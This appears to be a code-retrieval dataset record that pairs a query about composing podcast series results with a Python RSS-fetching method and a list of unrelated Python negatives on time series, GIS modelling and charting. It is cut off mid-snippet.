query
stringlengths
9
3.4k
document
stringlengths
9
87.4k
metadata
dict
negatives
listlengths
4
101
negative_scores
listlengths
4
101
document_score
stringlengths
3
10
document_rank
stringclasses
102 values
Run the task compose full series + add to our results
def run(self): while self.i < len(self.series): # Grab line + RSS s = self.series[self.i] rss = self.request_rss(s.feedUrl) # Compose Episodes ep_dicts = [] for entry in rss['entries']: ep_dicts.append(Episode(s, entry).__dict__) # Build result dict result_dict = dict() result_dict['series'] = deepcopy(s.__dict__) result_dict['series']['genres'] = \ result_dict['series']['genres'].split(';') result_dict['series']['type'] = 'series' result_dict['episodes'] = ep_dicts # Store podcast self.storer.store(result_dict) # Move onto the next one self.i += 20 print("Retrieved " + str(s.id))
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def execute_series(self):\n for n in xrange(self.conf[\"n_runs\"]):\n self.runs[n].execute()", "def run(self):\n if self.task == 'all':\n self.produce_all_term_data()\n else:\n self.produce_next_term_data()", "def run(self):\n import sacc\n import healpy\n import treecorr\n # Load the different pieces of data we need into\n # one large dictionary which we accumulate\n data = {}\n self.load_tomography(data)\n self.load_shear_catalog(data)\n self.load_random_catalog(data)\n # This one is optional - this class does nothing with it\n self.load_lens_catalog(data)\n # Binning information\n self.read_nbin(data)\n\n # Calculate metadata like the area and related\n # quantities\n meta = self.calculate_metadata(data)\n\n # Choose which pairs of bins to calculate\n calcs = self.select_calculations(data)\n\n sys.stdout.flush()\n \n # This splits the calculations among the parallel bins\n # It's not necessarily the most optimal way of doing it\n # as it's not dynamic, just a round-robin assignment,\n # but for this case I would expect it to be mostly fine\n results = []\n for i,j,k in self.split_tasks_by_rank(calcs):\n results += self.call_treecorr(data, i, j, k)\n\n # If we are running in parallel this collects the results together\n results = self.collect_results(results)\n\n # Save the results\n if self.rank==0:\n self.write_output(data, meta, results)", "async def allseries(self, ctx):\n\n await self.all_series_db.call(ctx)", "def reduce_run():", "def tasks():", "def run(self, input_time_series=None, num_iter=None, record=False,\n output=False):\n pass", "async def update_series(self):\n log.info('Updating all series')\n await self.updater.update_series()\n log.info('Done updating all series')", "def task():", "def process(self, results):\n raise NotImplementedError", "async def _analyze(self) -> Report:\n forecasts = []\n daily = []\n hourly = []\n for data in self._series:\n model = await self._build_model(data=data)\n future = await self._forecast_single(model=model)\n h, d = await self._process_trends_single(future=future)\n forecasts.append(Timeseries.from_df(\n name=data.get_name() + '_forecast',\n df=future,\n time_col='ds',\n val_col='yhat',\n ))\n daily.append(d)\n hourly.append(h)\n daily_agg = pd.concat(daily).groupby(level=0).mean()\n hourly_agg = pd.concat(hourly).groupby(level=0).mean()\n return Report(\n forecasts=forecasts,\n daily_trend=Trend(trend_vals=daily_agg.to_dict()),\n hourly_trend=Trend(trend_vals=hourly_agg.to_dict()),\n )", "def run(self):\r\n self.collect_data()", "def result(self):\n\n chart_series = [] # will hold all the series created\n\n # determine the sensor to plot from the sensor selected by the user.\n the_sensor = bmsapp.models.Sensor.objects.get(pk=self.request_params['select_sensor'])\n\n # get the requested averaging interval in hours\n averaging_hours = float(self.request_params['averaging_time'])\n\n # determine the start time for selecting records\n st_ts, end_ts = self.get_ts_range()\n\n # get the database records\n df = self.reading_db.dataframeForOneID(the_sensor.sensor_id, st_ts, end_ts, pytz.timezone(self.timezone))\n\n if not df.empty:\n\n # info needed to create each series (selection list, series name, visible)\n if self.schedule:\n occupied_times = df.ts.apply(self.schedule.is_occupied)\n unoccupied_times = -occupied_times\n\n series_info = [(None, 'All Data', True),\n (occupied_times, 'Occupied Periods', False),\n (unoccupied_times, 'Unoccupied Periods', False)]\n else:\n # no schedule, so just return the 'All Data' series\n series_info = [(None, 'All Data', True)]\n\n for mask, series_name, visibility in series_info:\n if mask is None:\n select_df = df\n else:\n select_df = df[mask]\n\n if averaging_hours:\n select_df = bmsapp.data_util.resample_timeseries(select_df, averaging_hours)\n\n histogram_series = bmsapp.data_util.histogram_from_series(select_df.val)\n\n chart_series.append({'x': [x for x,y in histogram_series],\n 'y': [y for x,y in histogram_series],\n 'type': 'scatter',\n 'mode': 'lines', \n 'name': series_name, \n 'visible': 'true' if visibility else 'legendonly'\n })\n\n opt = self.get_chart_options('plotly')\n opt['data'] = chart_series\n opt['layout']['title'] = the_sensor.title + ' Histogram: ' + self.building.title\n opt['layout']['xaxis']['title'] = the_sensor.unit.label\n opt['layout']['xaxis']['type'] = 'linear'\n opt['layout']['yaxis']['title'] = '% of Readings'\n opt['layout']['yaxis']['rangemode'] = 'tozero'\n\n html = basechart.chart_config.chart_container_html(opt['layout']['title'])\n\n return {'html': html, 'objects': [('plotly', opt)]}", "def final_series():\n tickers = pd.read_excel(os.path.abspath(os.path.dirname(__file__)) +\"./codigos.xlsx\", \n header=[0]).values.flatten()\n # tickers = pd.read_excel(\"./codigos.xlsx\", \n # header=[0]).values.flatten()\n ls = fetch_series(list(set(tickers)))\n net_series = [s for s in ls if _cleasing(s, [\"D\", \"M\"]) is not None]\n p = os.path.abspath(os.path.dirname(__file__))\n with open(p + \"/series_bcb\", \"wb\") as f:\n pickle.dump(net_series, f)\n # with open(\"./series_bcb\", \"wb\") as f:\n # pickle.dump(net_series, f) ", "def _append_results(self) -> None:\n self._t_mps.compute_traces(self._step, self._process_tensors)\n time = self.time(self._step)\n norm = self._t_mps.get_norm()\n bond_dimensions = self._t_mps.get_bond_dimensions()\n self._results['time'].append(time)\n self._results['norm'].append(norm)\n self._results['bond_dimensions'].append(bond_dimensions)\n for sites, dynamics in self._results['dynamics'].items():\n if isinstance(sites, int):\n sites_list = [sites]\n else:\n sites_list = list(sites)\n dynamics.add(\n time,\n self._t_mps.get_density_matrix(sites_list))\n self._t_mps.clear_traces()", "def task_run_core():\n\n ## initialize parameters\n if task_get_option('format'):\n fmts = task_get_option('format')\n else:\n fmts = 'HB' # default value if no format option given\n for fmt in fmts.split(','):\n last_updated = fetch_last_updated(fmt)\n write_message(\"last stored run date is %s\" % last_updated)\n\n sql = {\n \"all\" : \"\"\"SELECT br.id FROM bibrec AS br, bibfmt AS bf\n WHERE bf.id_bibrec = br.id AND bf.format = '%s'\"\"\" % fmt,\n \"last\": \"\"\"SELECT br.id FROM bibrec AS br\n INNER JOIN bibfmt AS bf ON bf.id_bibrec = br.id\n WHERE br.modification_date >= '%(last_updated)s'\n AND bf.format='%(format)s'\n AND bf.last_updated < br.modification_date\"\"\" \\\n % {'format': fmt,\n 'last_updated': last_updated.strftime('%Y-%m-%d %H:%M:%S')},\n \"missing\" : \"\"\"SELECT br.id\n FROM bibrec as br\n LEFT JOIN bibfmt as bf\n ON bf.id_bibrec = br.id AND bf.format ='%s'\n WHERE bf.id_bibrec IS NULL\n AND br.id BETWEEN %%s AND %%s\n \"\"\" % fmt,\n }\n sql_queries = []\n cds_query = {}\n if task_has_option(\"all\"):\n sql_queries.append(sql['all'])\n if task_has_option(\"last\"):\n sql_queries.append(sql['last'])\n if task_has_option(\"collection\"):\n cds_query['collection'] = task_get_option('collection')\n else:\n cds_query['collection'] = \"\"\n\n if task_has_option(\"field\"):\n cds_query['field'] = task_get_option('field')\n else:\n cds_query['field'] = \"\"\n\n if task_has_option(\"pattern\"):\n cds_query['pattern'] = task_get_option('pattern')\n else:\n cds_query['pattern'] = \"\"\n\n if task_has_option(\"matching\"):\n cds_query['matching'] = task_get_option('matching')\n else:\n cds_query['matching'] = \"\"\n\n if task_has_option(\"recids\"):\n recids = split_cli_ids_arg(task_get_option('recids'))\n else:\n recids = []\n\n ### sql commands to be executed during the script run\n ###\n bibreformat_task(fmt, sql, sql_queries, cds_query, task_has_option('without'), not task_has_option('noprocess'), recids)\n return True", "def task(self):", "def task(self):", "def _startLoop(self, tiltseriesdata):\n\t\t#calc series left\n\t\tself.stats['seriesleft'] = self.stats['seriescount'] - self.stats['count']\n\n\t\tif self.params['background'] is False:\n\t\t\tapDisplay.printColor( \"\\nStarting series %d ( skip:%d, remain:%d ) id:%d\"\n\t\t\t\t%(tiltseriesdata['number'], self.stats['skipcount'], self.stats['seriesleft'], \n\t\t\t\ttiltseriesdata.dbid,),\n\t\t\t\t\"green\")\n\t\t#only if a series was processed last\n\t\tif(self.stats['lastcount'] != self.stats['count']):\n\t\t\tsys.stderr.write(\"\\n\")\n\t\t\tself.stats['lastcount'] = self.stats['count']\n\t\t\tself._checkMemLeak()\n\t\t# skip if last image belong to the series doesn't exist:\n\t\timgtree = apDatabase.getImagesFromTiltSeries(tiltseriesdata,False)\n\t\timgpath = os.path.join(tiltseriesdata['session']['image path'], imgtree[0]['filename']+'.mrc')\n\t\tif not os.path.isfile(imgpath):\n\t\t\tapDisplay.printWarning(imgpath+\" not found, skipping\")\n\t\t\treturn False\n\n\t\t# skip if there are some problem with the series\n\t\tif self.__isShortTiltSeries(tiltseriesdata) or self.isBadTiltSeries(tiltseriesdata):\n\t\t\tapDisplay.printWarning(\"Series %d is not good enough for processing, skipping\" % (tiltseriesdata['number']))\n\t\t\tseriesname = \"series%3d\" % (tiltseriesdata['number'])\n\t\t\tself._writeDoneDict(seriesname)\n\t\t\tself.stats['count'] += 1\n\t\t\treturn False\n\n\t\t# check to see if series has already been processed\n\t\tif self._alreadyProcessed(tiltseriesdata):\n\t\t\t\n\t\t\treturn False\n\n\t\tself.stats['waittime'] = 0\n\n\t\tif self.reprocessSeries(tiltseriesdata) is True:\n\t\t\tif self.params['background'] is True:\n\t\t\t\tsys.stderr.write(\",\")\n\t\t\telse:\n\t\t\t\t\"\"\"apDisplay.printMsg(\"reprocessing series %d\" % (tiltseriesdata['number']))\"\"\"\n\t\telse:\n\t\t\tif self.params['background'] is True:\n\t\t\t\tsys.stderr.write(\".\")\n\t\t\telse:\n\t\t\t\t\"\"\"apDisplay.printMsg(\"processing series %d\" % (tiltseriesdata['number']))\"\"\"\n\n\t\treturn True", "def run_crawler(self) -> List[JobEventSchema]:\n print(f\"Ready for scraping, current task: {self.tasks}\")\n\n crawling_result = []\n for task in self.tasks:\n result = task.run()\n crawling_result.extend(result)\n return crawling_result", "def step(self, actions):\n\n representative_data = []\n original_data = []\n\n actions = np.array(actions).reshape(3, -1)\n\n for np_data, df_data, calculator, som, action in zip(self.np_data_list, self.df_data_list, self.calculators, self.som_objects, actions):\n\n representative_days, cluster_numbers = calculator.get_representative_days(\n som, np_data, action)\n\n representative_days = pd.DataFrame(representative_days)\n\n representative_days = self.wide_to_long(representative_days)\n approximation_calc = ApproximateData(df_data, 4)\n representative_days = ApproximateData(df_data, 4).get_load_duration_curve(\n representative_days, cluster_numbers)\n\n representative_data.append(representative_days)\n\n # original_days = approximation_calc.get_load_duration_curve(\n # year=\"2013\")\n\n\n\n # original_data.append(original_days)\n\n # metrics_calculator = Metrics(original_data[0], representative_data[0], original_data[1],\n # representative_data[1], original_data[2], representative_data[2], \"dc\")\n\n pv_original = pd.read_csv(\n '{}data/processed/resources/pv_processed.csv'.format(project_dir))\n wind_original = pd.read_csv(\n '{}data/processed/resources/onshore_processed.csv'.format(project_dir))\n load_original = pd.read_csv(\n '{}data/processed/demand/load_NG/load_processed_normalised.csv'.format(project_dir))\n\n pv_original_ldcs, wind_original_ldcs, load_original_ldcs = get_each_ldc(pv_original, wind_original, load_original)\n\n multi_year_metrics_calculator = MultiYearMetrics(pv_original_ldcs, representative_data[0], wind_original_ldcs, representative_data[1], load_original_ldcs, representative_data[2], self.year_start)\n multi_year_metrics = multi_year_metrics_calculator.get_multi_year_average_metrics(\"dc\")\n multi_year_metrics = multi_year_metrics.reset_index()\n # logger.debug(\"multi_year_metrics: \\n{}\".format(multi_year_metrics))\n\n nrmse = multi_year_metrics[multi_year_metrics['metric'] == 'nrmse dc'].iloc[0].value\n rae = multi_year_metrics[multi_year_metrics['metric'] == 'rae dc'].iloc[0].value\n correlation = multi_year_metrics[multi_year_metrics['metric'] == 'correlation'].iloc[0].value\n\n # error_metrics = metrics_calculator.get_mean_error_metrics()\n # nrmse = error_metrics.iloc[1].value\n # rae = error_metrics.iloc[2].value\n # correlation = error_metrics.iloc[0].value\n # reward = -error_metrics.value.sum()\n # logger.info(\"error_metrics: {}\".format(error_metrics))\n # logger.info(\"error_metrics: {}\".format(error_metrics.iloc[0]))\n\n # return reward\n return nrmse, rae, correlation", "def contents_build_1(self, **kwargs):\n\n SeriesFilesCount = 10\n for key,val in kwargs.iteritems():\n if key == 'SeriesFilesCount': SeriesFilesCount = val\n\n # First, build a PACS_pull tree\n self.dataComponent_build(\n path = '/',\n plugin = 'PACSPull',\n SeriesFilesCount = SeriesFilesCount\n )\n\n self.dataComponent_pluginBuild(\n path = '/plugins'\n )\n\n\n # Now \"run\" an mri_convert to nifi\n # self.dataComponent_pluginRun(\n # inputPath = '/dataView/files',\n # outputPath = '/plugin/run',\n # plugin = 'mri_convert'\n # )", "def run(self):\n with QAFigure(self.dataset, 'AL52 Carbon Monoxide') as fig:\n\n cal = self.dataset['AL52CO_cal_status'].data.copy()\n _groups = (cal != cal.shift()).cumsum()\n _groups[cal < 1] = np.nan\n _groups.dropna(inplace=True)\n groups = cal.groupby(_groups)\n\n in_cal = self.dataset['AL52CO_cal_status'].data.copy() * 0\n\n for group in groups:\n start = group[1].index[0]\n end = group[1].index[-1] + datetime.timedelta(seconds=CAL_FLUSH_TIME)\n in_cal.loc[start:end] = 1\n\n self.cal = in_cal\n\n self.make_lamptemp(fig)\n self.make_flows(fig)\n self.make_cellpress(fig)\n self.make_co(fig)", "def run(self):\n results = []\n for task in self.tasks:\n results.append(task.run())\n self.tasks = []\n return results", "def compute(self, write_to_tar=True):\n data = self._prep_data(self._get_all_data(self.start_date,\n self.end_date),\n self.var.func_input_dtype)\n logging.info('Computing timeseries for {0} -- '\n '{1}.'.format(self.start_date, self.end_date))\n full, monthly, eddy = self._make_full_mean_eddy_ts(data)\n reduced = self._apply_all_time_reductions(full, monthly, eddy)\n logging.info(\"Writing desired gridded outputs to disk.\")\n for dtype_time, data in reduced.items():\n data = _add_metadata_as_attrs(data, self.var.units,\n self.var.description,\n self.dtype_out_vert)\n self.save(data, dtype_time, dtype_out_vert=self.dtype_out_vert,\n save_files=True, write_to_tar=write_to_tar)\n return self", "def prepare_series(self, result_dir):\n output = {}\n output['title'] = self.title\n output['x'] = self.x\n output['y'] = self.y\n output['series'] = []\n for series in self.series:\n idfile = os.path.join(result_dir, 'benchmark_' + str(series['id']) +\n '.json')\n rows = json_from_file(idfile)\n # it is assumed each row has the same names of columns\n keys = rows[0].keys()\n # skip the series if it does not have required keys\n if self.x not in keys or self.y not in keys:\n continue\n points = [[row[self.x], row[self.y]] for row in rows]\n output['series'].append({'label': series['label'], 'points': points})\n # save the series to a file\n series_path = self._series_file(result_dir)\n if os.path.exists(series_path):\n figures = json_from_file(series_path)\n else:\n figures = {}\n figures[self.key] = output\n with open(series_path, 'w') as file:\n json.dump(figures, file, indent=4)\n # mark as done\n self.output['done'] = True", "def run(self):\n # get components list\n #component_id_list = self.getComponentsList()\n asset_id = 3776\n component_id_list = self.get_component_info_for_one_asset(asset_id)\n # call computeResults method\n results = self.compute_results(component_id_list)\n # write to the output file\n self.write_to_file(results)", "def run(self):\n self.evaluate()\n self.accumulate()\n self.summarize()", "def test_sales_forecasting_multiprocessing(self):\n with TemporaryDirectory() as temp_dir:\n self.run_command(\n (\n \"python3 main.py --use-synthetic-data --epochs 1\"\n f\" --mov-mean-window 0 --log-dir {temp_dir}\"\n \" --multiprocessing\"\n ),\n working_path,\n [\n \"Begin training loop\", \"Training:\", r\"epoch:\\s+1\",\n \"Validation:\", \"Best RMSPE|no valid RMSPE results\"\n ]\n )", "def click_time_series_aggregating(output_dir, ignore_cache):\n unit = get_unit_name()\n\n def single_sensor_label_from_topic(topic):\n split_topic = topic.split(\"/\")\n # return f\"{split_topic[1]}-{split_topic[-2]}/{split_topic[-1]}\"\n return f\"{split_topic[1]}-{split_topic[-1]}\"\n\n def unit_from_topic(topic):\n split_topic = topic.split(\"/\")\n return split_topic[1]\n\n raw135 = TimeSeriesAggregation( # noqa: F841\n \"pioreactor/+/+/od_raw/+/+\", # see note above about why we have no filter on experiment\n output_dir,\n experiment=UNIVERSAL_EXPERIMENT,\n job_name=\"od_raw_time_series_aggregating\",\n unit=unit,\n ignore_cache=ignore_cache,\n extract_label=single_sensor_label_from_topic,\n write_every_n_seconds=10,\n time_window_seconds=60\n * int(config[\"ui.overview.settings\"][\"raw_od_lookback_minutes\"]),\n record_every_n_seconds=5,\n )\n\n filtered135 = TimeSeriesAggregation( # noqa: F841\n \"pioreactor/+/+/od_filtered/+/+\",\n output_dir,\n experiment=UNIVERSAL_EXPERIMENT,\n job_name=\"od_filtered_time_series_aggregating\",\n unit=unit,\n ignore_cache=ignore_cache,\n extract_label=single_sensor_label_from_topic,\n write_every_n_seconds=10,\n time_window_seconds=60\n * int(config[\"ui.overview.settings\"][\"filtered_od_lookback_minutes\"]),\n record_every_n_seconds=4,\n )\n\n growth_rate = TimeSeriesAggregation( # noqa: F841\n \"pioreactor/+/+/growth_rate\",\n output_dir,\n experiment=UNIVERSAL_EXPERIMENT,\n job_name=\"growth_rate_time_series_aggregating\",\n unit=unit,\n ignore_cache=ignore_cache,\n extract_label=unit_from_topic,\n write_every_n_seconds=10,\n record_every_n_seconds=3 * 60, # TODO: move this to a config param\n )\n\n alt_media_fraction = TimeSeriesAggregation( # noqa: F841\n \"pioreactor/+/+/alt_media_calculating/alt_media_fraction\",\n output_dir,\n experiment=UNIVERSAL_EXPERIMENT,\n job_name=\"alt_media_fraction_time_series_aggregating\",\n unit=unit,\n ignore_cache=ignore_cache,\n extract_label=unit_from_topic,\n write_every_n_seconds=10,\n record_every_n_seconds=1,\n )\n\n while True:\n signal.pause()", "def run(self):\r\n __data__ = abspath(join(dirname( __file__ ), '..', 'data'))\r\n files = [ f for f in listdir(__data__) \r\n if isfile(join(__data__,f)) ]\r\n\r\n # Spawn processes\r\n pids = []\r\n for index, ts_name in enumerate(files):\r\n if ts_name == \".DS_Store\":\r\n \tcontinue\r\n\r\n __data__ = abspath(join(dirname( __file__ ), '..', 'data'))\r\n with open(join(__data__ + \"/\" + ts_name), 'r') as f:\r\n timeseries = json.loads(f.read())\r\n p = Process(target=run_algorithms, args=(timeseries, ts_name))\r\n pids.append(p)\r\n p.start()\r\n\r\n # Send wait signal to zombie processes\r\n for p in pids:\r\n p.join()", "def series_ingestion(series:List[dict]) -> None:\n for srs in series:\n try:\n add_series(\"BCB.\" + str(srs['number']), \n srs['nome'], \n *gestores[srs['gestor']])\n except:\n logger.error(f\"Unable to add series BCB.{srs['number']}\")", "def __call__(self, results):\n\n results = self._mosaic_transform(results)\n return results", "def task_parse_results():\n pass", "def rainfall_series(self):\n\n # assign local temporal variables\n datatype = 'strds'\n increment = str(self.rain_interval)+\" minutes\"\n raster = 'raster'\n rain_excess = 'rain_excess'\n net_difference = 'net_difference'\n #iterations = sum(1 for row in precip)\n\n # create a raster space time dataset\n gscript.run_command(\n 't.create',\n type=datatype,\n temporaltype=self.temporaltype,\n output=self.elevation_timeseries,\n title=self.elevation_title,\n description=self.elevation_description,\n overwrite=True)\n gscript.run_command(\n 't.create',\n type=datatype,\n temporaltype=self.temporaltype,\n output=self.depth_timeseries,\n title=self.depth_title,\n description=self.depth_description,\n overwrite=True)\n gscript.run_command(\n 't.create',\n type=datatype,\n temporaltype=self.temporaltype,\n output=self.erdep_timeseries,\n title=self.erdep_title,\n description=self.erdep_description,\n overwrite=True)\n gscript.run_command(\n 't.create',\n type=datatype,\n temporaltype=self.temporaltype,\n output=self.flux_timeseries,\n title=self.flux_title,\n description=self.flux_description,\n overwrite=True)\n gscript.run_command(\n 't.create',\n type=datatype,\n temporaltype=self.temporaltype,\n output=self.difference_timeseries,\n title=self.difference_title,\n description=self.difference_description,\n overwrite=True)\n\n # register the initial digital elevation model\n gscript.run_command(\n 't.register',\n type=raster,\n input=self.elevation_timeseries,\n maps=self.elevation,\n start=self.start,\n increment=increment,\n flags='i',\n overwrite=True)\n\n # create evolution object\n evol = Evolution(\n elevation=self.elevation,\n precipitation=self.precipitation,\n start=self.start,\n rain_intensity=self.rain_intensity,\n rain_interval=self.rain_interval,\n walkers=self.walkers,\n runoff=self.runoff,\n mannings=self.mannings,\n detachment=self.detachment,\n transport=self.transport,\n shearstress=self.shearstress,\n density=self.density,\n mass=self.mass,\n grav_diffusion=self.grav_diffusion,\n erdepmin=self.erdepmin,\n erdepmax=self.erdepmax,\n k_factor=self.k_factor,\n c_factor=self.c_factor,\n m=self.m,\n n=self.n,\n threads=self.threads,\n fill_depressions=self.fill_depressions)\n\n # open txt file with precipitation data\n with open(evol.precipitation) as csvfile:\n\n # check for header\n has_header = csv.Sniffer().has_header(csvfile.read(1024))\n\n # rewind\n csvfile.seek(0)\n\n # skip header\n if has_header:\n next(csvfile)\n\n # parse time and precipitation\n precip = csv.reader(csvfile, delimiter=',', skipinitialspace=True)\n\n # initial run\n initial = next(precip)\n evol.start = initial[0]\n evol.rain_intensity = 'rain_intensity'\n # compute rainfall intensity (mm/hr)\n # from rainfall observation (mm)\n gscript.run_command(\n 'r.mapcalc',\n expression=\"{rain_intensity}\"\n \"={rain_observation}\"\n \"/{rain_interval}\"\n \"*60.\".format(\n rain_intensity=evol.rain_intensity,\n rain_observation=float(initial[1]),\n rain_interval=self.rain_interval),\n overwrite=True)\n\n # determine mode and run model\n if self.mode == \"simwe_mode\":\n (evolved_elevation, time, depth, erosion_deposition,\n difference) = evol.erosion_deposition()\n # remove relative timestamps\n # from r.sim.water and r.sim.sediment\n gscript.run_command(\n 'r.timestamp',\n map=depth,\n date='none')\n gscript.run_command(\n 'r.timestamp',\n map=erosion_deposition,\n date='none')\n\n elif self.mode == \"usped_mode\":\n (evolved_elevation, time, depth, erosion_deposition,\n difference) = evol.usped()\n\n elif self.mode == \"rusle_mode\":\n (evolved_elevation, time, depth, sediment_flux,\n difference) = evol.rusle()\n\n else:\n raise RuntimeError(\n '{mode} mode does not exist').format(mode=self.mode)\n\n # register the evolved maps\n gscript.run_command(\n 't.register',\n type=raster,\n input=self.elevation_timeseries,\n maps=evolved_elevation,\n start=evol.start,\n increment=increment,\n flags='i',\n overwrite=True)\n gscript.run_command(\n 't.register',\n type=raster,\n input=self.depth_timeseries,\n maps=depth,\n start=evol.start,\n increment=increment,\n flags='i',\n overwrite=True)\n try:\n gscript.run_command(\n 't.register',\n type=raster,\n input=self.erdep_timeseries,\n maps=erosion_deposition,\n start=evol.start,\n increment=increment,\n flags='i',\n overwrite=True)\n except (NameError, CalledModuleError):\n pass\n try:\n gscript.run_command(\n 't.register',\n type=raster,\n input=self.flux_timeseries,\n maps=sediment_flux,\n start=evol.start,\n increment=increment,\n flags='i', overwrite=True)\n except (NameError, CalledModuleError):\n pass\n gscript.run_command(\n 't.register',\n type=raster,\n input=self.difference_timeseries,\n maps=difference,\n start=evol.start,\n increment=increment,\n flags='i',\n overwrite=True)\n\n # run the landscape evolution model for each rainfall record\n for row in precip:\n\n # update the elevation\n evol.elevation=evolved_elevation\n\n # update time\n evol.start=row[0]\n\n # compute rainfall intensity (mm/hr)\n # from rainfall observation (mm)\n rain_intensity = 'rain_intensity'\n gscript.run_command(\n 'r.mapcalc',\n expression=\"{rain_intensity}\"\n \"={rain_observation}\"\n \"/{rain_interval}\"\n \"*60.\".format(\n rain_intensity=rain_intensity,\n rain_observation=float(row[1]),\n rain_interval=self.rain_interval),\n overwrite=True)\n\n # derive excess water (mm/hr) from rainfall rate (mm/hr)\n # plus the depth (m) per rainfall interval (min)\n gscript.run_command(\n 'r.mapcalc',\n expression=\"{rain_excess}\"\n \"={rain_intensity}\"\n \"+{depth}\"\n \"/1000.\"\n \"/{rain_interval}\"\n \"*60.\".format(\n rain_excess=rain_excess,\n rain_intensity=rain_intensity,\n depth=depth,\n rain_interval=self.rain_interval),\n overwrite=True)\n\n # update excess rainfall\n gscript.run_command(\n 'r.mapcalc',\n expression=\"{rain_intensity} = {rain_excess}\".format(\n rain_intensity='rain_intensity',\n rain_excess=rain_excess),\n overwrite=True)\n evol.rain_intensity = rain_intensity\n\n # determine mode and run model\n if self.mode == \"simwe_mode\":\n (evolved_elevation, time, depth, erosion_deposition,\n difference) = evol.erosion_deposition()\n # remove relative timestamps\n # from r.sim.water and r.sim.sediment\n gscript.run_command(\n 'r.timestamp',\n map=depth,\n date='none')\n gscript.run_command(\n 'r.timestamp',\n map=erosion_deposition,\n date='none')\n\n elif self.mode == \"usped_mode\":\n (evolved_elevation, time, depth, erosion_deposition,\n difference) = evol.usped()\n\n elif self.mode == \"rusle_mode\":\n (evolved_elevation, time, depth, sediment_flux,\n difference) = evol.rusle()\n\n else:\n raise RuntimeError(\n '{mode} mode does not exist').format(mode=self.mode)\n\n # register the evolved maps\n gscript.run_command(\n 't.register',\n type=raster,\n input=self.elevation_timeseries,\n maps=evolved_elevation,\n start=evol.start,\n increment=increment,\n flags='i',\n overwrite=True)\n gscript.run_command(\n 't.register',\n type=raster,\n input=self.depth_timeseries,\n maps=depth,\n start=evol.start,\n increment=increment,\n flags='i',\n overwrite=True)\n try:\n gscript.run_command(\n 't.register',\n type=raster,\n input=self.erdep_timeseries,\n maps=erosion_deposition,\n start=evol.start,\n increment=increment,\n flags='i',\n overwrite=True)\n except (NameError, CalledModuleError):\n pass\n try:\n gscript.run_command(\n 't.register',\n type=raster,\n input=self.flux_timeseries,\n maps=sediment_flux,\n start=evol.start,\n increment=increment,\n flags='i', overwrite=True)\n except (NameError, CalledModuleError):\n pass\n gscript.run_command(\n 't.register',\n type=raster,\n input=self.difference_timeseries,\n maps=difference,\n start=evol.start,\n increment=increment,\n flags='i',\n overwrite=True)\n\n # remove temporary maps\n gscript.run_command(\n 'g.remove',\n type='raster',\n name=['rain_excess'],\n flags='f')\n\n # compute net elevation change\n gscript.run_command(\n 'r.mapcalc',\n expression=\"{net_difference}\"\n \"= {evolved_elevation}-{elevation}\".format(\n net_difference=net_difference,\n elevation=self.elevation,\n evolved_elevation=evol.elevation),\n overwrite=True)\n gscript.write_command(\n 'r.colors',\n map=net_difference,\n rules='-',\n stdin=difference_colors)", "def on_task_input(self, task, config):\n parsed_url = urlparse(config.get('base_url'))\n base_url = '{scheme}://{url}:{port}/api/v2'.format(\n scheme=parsed_url.scheme, url=parsed_url.netloc, port=config.get('port')\n )\n\n body_auth = {'username': config.get('username'), 'password': config.get('password')}\n\n api_key = task.requests.post(f'{base_url}/authenticate', json=body_auth).json()['token']\n\n headers = {'x-auth': 'Bearer ' + api_key}\n\n params = {'limit': 1000}\n\n series = task.requests.get(f'{base_url}/series', params=params, headers=headers).json()\n\n entries = []\n for show in series:\n logger.debug('processing show: {}', show)\n if (\n (show['config']['paused'] and config.get('only_monitored'))\n or show['status'] == 'Ended'\n and not config.get('include_ended')\n ):\n logger.debug('discarted show: {}', show)\n\n entry = Entry(title=show['title'], url='', series_name=show['title'])\n\n if entry.isvalid():\n entries.append(entry)\n else:\n logger.error(f'Invalid entry created? {entry}')\n\n return entries", "def result(self):\n\n # determine the X and Y sensors to plot from those sensors selected by the user.\n sensorX = bmsapp.models.Sensor.objects.get(pk=self.request_params['select_sensor_x'])\n sensorY = bmsapp.models.Sensor.objects.get(pk=self.request_params['select_sensor_y'])\n\n # determine the averaging time\n averaging_hours = float(self.request_params['averaging_time_xy'])\n\n # get the building's timezone\n tz = pytz.timezone(self.timezone)\n\n # determine the start and end time for selecting records\n st_ts, end_ts = self.get_ts_range()\n\n # get the dividing date, if there is one\n div_datestring = self.request_params['div_date']\n div_dt = tz.localize(parser.parse(div_datestring)) if len(div_datestring) else None\n\n\n # The list that will hold each series\n series = []\n\n # get the X and Y sensor records and perform the requested averaging\n dfX = self.reading_db.dataframeForOneID(sensorX.sensor_id, st_ts, end_ts, tz)\n dfY = self.reading_db.dataframeForOneID(sensorY.sensor_id, st_ts, end_ts, tz)\n\n if not dfX.empty and not dfY.empty: # both sensors have some data, so proceed to average the data points\n \n dfX = bmsapp.data_util.resample_timeseries(dfX,averaging_hours)\n dfX.rename(columns = {'val':'X'}, inplace = True)\n\n dfY = bmsapp.data_util.resample_timeseries(dfY,averaging_hours)\n dfY.rename(columns = {'val':'Y','ts':'tsY'}, inplace = True)\n\n # Join the X and Y values for the overlapping time intervals and make\n # a list of points.\n df_all = dfX.join(dfY, how='inner') # inner join does intersection of timestamps\n\n # make sure there are matched records before continuing\n if len(df_all):\n\n # add a point name column to be used in the tooltip.\n df_all['name'] = df_all.index.strftime('%a %m/%d/%y %H:%M')\n\n # add a column identifying whether point is in occupied or unoccupied period.\n resolution = self.occupied_resolution()\n if (self.schedule is None) or (resolution is None):\n # no schedule or data doesn't lend itself to classifying\n # consider all points to be occupied\n df_all['occupied'] = 1\n else:\n df_all['occupied'] = [self.schedule.is_occupied(ts, resolution=resolution) for ts in df_all.ts]\n\n # Set up the parameters for the different series of data\n # Required Info is (starting datetime, ending datetime, occupied status (0 or 1), series name, \n # series color, series symbol, series radius, series zindex).\n now_dt = datetime.now()\n if div_dt:\n # A dividing date was provided by the user.\n div_dt = div_dt.replace(tzinfo=None) # needs to be naive\n ser_params = ( (datetime(1970,1,1), div_dt, 1, 'Prior to %s' % div_datestring, '#2f7ed8', 'circle', 4.5),\n (datetime(1970,1,1), div_dt, 0, 'Prior to %s, Unoccupied' % div_datestring, '#2f7ed8', 'triangle-up', 3),\n (div_dt, now_dt, 1, '%s and beyond' % div_datestring, '#FF0000', 'circle', 4.5),\n (div_dt, now_dt, 0, '%s and beyond, Unoccupied' % div_datestring, '#FF0000', 'triangle-up', 3) )\n else:\n # Divide data by how recent it is.\n ser_params = ( (now_dt - timedelta(days=1), now_dt, 1, 'Last 24 Hours', '#FF0000', 'circle', 